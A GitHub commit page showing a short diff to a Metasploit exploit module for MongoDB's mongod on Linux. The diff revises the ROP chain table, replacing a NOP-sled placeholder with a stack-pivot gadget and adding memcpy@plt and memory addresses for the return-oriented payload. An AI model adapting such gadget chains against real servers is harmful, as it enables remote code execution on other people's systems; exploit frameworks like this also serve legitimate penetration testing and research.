We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent baf1ce2 commit 6b639adCopy full SHA for 6b639ad
modules/exploits/linux/misc/mongod_native_helper.rb
@@ -34,13 +34,19 @@ def initialize(info={})
34
'Arch' => ARCH_X86,
35
'mmap' => [
36
0x0816f768, #mmap_64@plt
37
- 0x0c0c0c0c, #NOPSLED+SHELLCODE
+ 0x8666d07, #add esp, 0x14 / pop ebx / pop ebp / ret
38
0x0c0c0000,
39
- 0x00010000,
+ 0x00002000,
40
0x00000007,
41
0x00000031,
42
0xffffffff,
43
0x00000000,
44
+ 0x78696761,
45
+ 0x0816e4c8, #memcpy@plt
46
+ 0x0c0c0c0c,
47
+ 0x0c0c0000,
48
+ 0x0c0b0000,
49
+ 0x00002000
50
],
51
'ret' => [0x08055a70], #ret
52
'gadget1' => "0x836e204", #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]
0 commit comments